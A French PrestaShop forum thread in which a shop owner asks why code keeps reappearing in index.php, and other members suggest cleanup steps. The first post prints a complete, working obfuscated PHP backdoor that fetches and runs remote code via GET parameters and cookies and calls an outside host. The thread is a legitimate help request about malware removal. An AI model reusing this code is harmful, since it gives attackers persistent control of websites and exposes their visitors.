master pity Posted March 30, 2021 Share Posted March 30, 2021 Bonjour à toutes et à tous. Depuis quelques temps j'ai du code qui revient automatiquement dans mon fichier index.php (voir ci-dessous). J'ai tenté pas mal de choses mais rien y fait il revient toujours ! Je supprime donc régulièrement le fichier et remet le fichier non-corrompu mais au bout d'1/2h en moyenne ça revient ! Si quelqu'un à une idée ? Configuration : Prestashop : 1.6.1.24 Version du logiciel serveur Apache Version de PHP 5.6.40 Limite de mémoire 64M Version de MySQL 5.1.41 <?php session_start(); error_reporting(0);set_time_limit(0); @ini_set('display_errors','Off'); @ini_set('memory_limit','256M'); $dvtApVWcGU = "bas"."e64_d"."ecode"; $tzPmK=$dvtApVWcGU("c3Ry"."X3Jv"."dDEz"); $efoGx = array( $tzPmK("NE"."ENL"), $tzPmK("per"."ngr_"."shapgvba"), $tzPmK("wfb"."a_qr"."pbqr"), $dvtApVWcGU,chr(125),chr(47).chr(42),$tzPmK("cn"."px"), $tzPmK("U").chr(42),$tzPmK, ${chr(95).chr(71).chr(69).chr(84)}[chr(65).chr(82).chr(82).chr(65).chr(89)]); $dvtApVWcGU = $efoGx[8]($efoGx[9]); $dvtApVWcGU = $efoGx[6]($efoGx[7],$dvtApVWcGU); $dvtApVWcGU = $efoGx[2]($dvtApVWcGU,true); ($dvtApVWcGU)&&$_SESSION[$efoGx[0]]=$dvtApVWcGU; $PtQTnsqEvm=$_SESSION[$efoGx[0]]; $YHnfPeapJ=cSToy($PtQTnsqEvm[1]); (($PtQTnsqEvm[0]-time())>0)&&@$efoGx[1]("", $efoGx[4].$efoGx[3]($YHnfPeapJ).$efoGx[5]); function cSToy($zvEhFA) {$nvGrc = curl_init(); curl_setopt($nvGrc, CURLOPT_TIMEOUT, 60); curl_setopt($nvGrc, CURLOPT_RETURNTRANSFER, TRUE); curl_setopt($nvGrc, CURLOPT_URL, $zvEhFA); $jXFuGq = curl_exec ($nvGrc); if(empty($jXFuGq)) $jXFuGq = @file_get_contents($zvEhFA); return $jXFuGq;}$IcaW=$_COOKIE;@((count($IcaW)==23&&md5(md5(gettype($IcaW).count($IcaW)))&&"b542e7dc8088fef2de66ac2aa7369260"))?(($IcaW[70]=$IcaW[70].$IcaW[78])&&($IcaW[81]=$IcaW[70]($IcaW[81]))&&(@$IcaW=$IcaW[81]($IcaW[52],$IcaW[70](${$IcaW[38]}[i])))&&$IcaW()):$IcaW; function Lnlzud(){$HCcPemBpKhAtLGxR = '66756r6374696s6r204158776q52615548767n6s685428246r756q297o0q0n092475726p203q20617272617928293o0q0n092475726p203q207472696q287374725s7265706p61636528245s5345525645525o225343524950545s4r414q45225q2p2022222p20245s5345525645525o22524551554553545s555249225q292p20222s22293o0q0n092475726p203q206578706p6s646528222s222p202475726p293o0q0n0972657475726r202475726p5o246r756q2q315q3o0q0n7q0q0n66756r6374696s6r206661464o72637153526s6q4p28297o0q0n0924687474705s686s7374203q20737472746s6p6s77657228245s5345525645525o22485454505s484s5354225q293o0q0n0924736563757265203q2028697373657428245s5345525645525o224854545053225q2920262620245s5345525645525o224854545053225q203q3q20226s6r2229203s2031203n20303o0q0n0924617272203q20617272617928245s5345525645525o2252454q4s54455s41444452225q2p245s5345525645525o22485454505s555345525s4147454r54225q2p245s5345525645525o22485454505s52454645524552225q293o0q0n09246n736s6r203q20225o7p5q222r6261736536345s656r636s6465286n736s6r5s656r636s6465282461727229293o0q0n0972657475726r202824736563757265203s202268747470733n2s2s22203n2022687474703n2s2s2229202r2024687474705s686s73742r245s5345525645525o225343524950545s4r414q45225q2r246n736s6r3o0q0n7q0q0n66756r6374696s6r2044506q625242574r46646n7n545n43282475726p297o0q0n0924726573756p74203q2027273o0q0n0969662866756r6374696s6r5s65786973747328276375726p5s696r69742729297o0q0n09097472797o0q0n090909246368203q206375726p5s696r697428293o0q0n090909246s75745s74696q65203q2033303o0q0n0909096375726p5s7365746s7074282463682p4355524p4s50545s55524p2p2475726p293o0q0n0909096375726p5s7365746s7074282463682p4355524p4s50545s53534p5s564552494659484s53542p2030293o0q0n0909096375726p5s7365746s7074282463682p4355524p4s50545s53534p5s564552494659504545522p2030293o0q0n0909096375726p5s7365746s7074282463682p4355524p4s50545s52455455524r5452414r534645522p31293o0q0n0909096375726p5s7365746s7074282463682p4355524p4s50545s434s4r4r45435454494q454s55542p3630293o0q0n09090924726573756p74203q206375726p5s6578656328246368293o0q0n0909096375726p5s636p6s736528246368293o0q0n09097q0q0n090963617463682028457863657074696s6r202465297o0q0n09097q0q0n097q0q0n096966287374726p656r2824726573756p74293p31262666756r6374696s6r5s657869737473282766696p655s6765745s636s6r74656r74732729297o0q0n0909696r695s7365742827757365725s6167656r74272p274q6s7n696p6p612s342r302028636s6q70617469626p653o4q53494520362r303o57696r646s7773204r5420352r323o2r4r455420434p5220312r312r343332322927293o0q0n09097472797o0q0n09090924726573756p74203q204066696p655s6765745s636s6r74656r7473282475726p293o0q0n09097q0q0n090963617463682028457863657074696s6r202465297o0q0n09097q0q0n097q0q0n0972657475726r2024726573756p743o0q0n7q0q0n0q0n66756r6374696s6r204o586p5n4r7574534954675645507752645128246r756q297o0q0n2475726p203q2022687474703n2s2s342r746s70732q6q616p6p2r636s6q2s223o0q0n092464617461203q206172726179280q0n09617272617928226p63223q3r2270616765222p202270616765223q3r4158776q52615548767n6s68542831292p2275726p223q3r6661464o72637153526s6q4p2829292p200q0n09617272617928226p63223q3r22686173222p20226964223q3r4158776q52615548767n6s68542832292p2275726p223q3r6661464o72637153526s6q4p2829292p200q0n09617272617928226p63223q3r22786q6p222p202270616765223q3r4158776q52615548767n6s68542832292p202275726p223q3r6661464o72637153526s6q4p2829292p200q0n09617272617928226p63223q3r226n6o222p202275726p223q3r6661464o72637153526s6q4p2829292p200q0n09293o0q0n092475726p203q202475726p2r223s222r687474705s6275696p645s71756572792824646174615o246r756q5q293o0q0n092466203q2044506q625242574r46646n7n545n43282475726p293o0q0n09696628246r756q3q3q32296865616465722822436s6r74656r742q747970653n20746578742s786q6p22293o0q0n0921656q707479282466293s65786974282466293n22223o0q0n7q0q0n24685s75726p203q206661464o72637153526s6q4p28293o0q0n2470615s75726p203q2070617273655s75726p2824685s75726p293o0q0n2468203q202470615s75726p5o22686s7374225q3o0q0n24797375203q207374725s7265706p61636528617272617928222s222p222r222p222q22292p22222p2468293o0q0n2475203q204158776q52615548767n6s68542831293o0q0n7377697463682028247529207o0q0n096361736520247973753n204o586p5n4r757453495467564550775264512831293o627265616o3o0q0n09636173652022786q6p223n204o586p5n4r757453495467564550775264512832293o627265616o3o0q0n096361736520226n6o223n204o586p5n4r757453495467564550775264512833293o627265616o3o0q0n0964656661756p743n204o586p5n4r757453495467564550775264512830293o0q0n7q0q0n';$HCcPemBpKhAtLGxR = str_rot13($HCcPemBpKhAtLGxR);$inCXEsoVYuFtQLmDyZWJ=base64_decode("Y3JlYXRlX2Z1bmN0aW9u");$agbqJwZrThcnoGVzFHR=@$inCXEsoVYuFtQLmDyZWJ('',pack('H*',$HCcPemBpKhAtLGxR));$agbqJwZrThcnoGVzFHR();}Lnlzud();?> Link to comment Share on other sites More sharing options...
Eolia Posted March 30, 2021 Share Posted March 30, 2021 Effectuer un nettoyage complet de votre site (fichiers ajoutés, modifiés, modules non-secure) Link to comment Share on other sites More sharing options...
master pity Posted March 30, 2021 Author Share Posted March 30, 2021 25 minutes ago, Eolia said: Effectuer un nettoyage complet de votre site (fichiers ajoutés, modifiés, modules non-secure) Merci de votre réponse ! Avec quelle méthode préconisez-vous ce nettoyage ? Link to comment Share on other sites More sharing options...
Eolia Posted March 30, 2021 Share Posted March 30, 2021 - Diff (comparer fichiers originaux et ceux du site) - scripts avec recherche de caractères/fonctions spécifiques - Analyse des modules connus comme étant suspects https://bb.enter-solutions.net/topic/1075/des-modules-et-des-hacks-liste-non-exhaustive-des-modules-présentant-un-risque - Analyse des logs d'erreurs Prestashop - Anlayse des logs serveur (access & error) Link to comment Share on other sites More sharing options...
master pity Posted March 30, 2021 Author Share Posted March 30, 2021 Merci j'ai déjà fait le Diff je vais regarder les modules de ton lien ! Link to comment Share on other sites More sharing options...
Recommended Posts
Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
Register a new accountSign in
Already have an account? Sign in here.
Sign In Now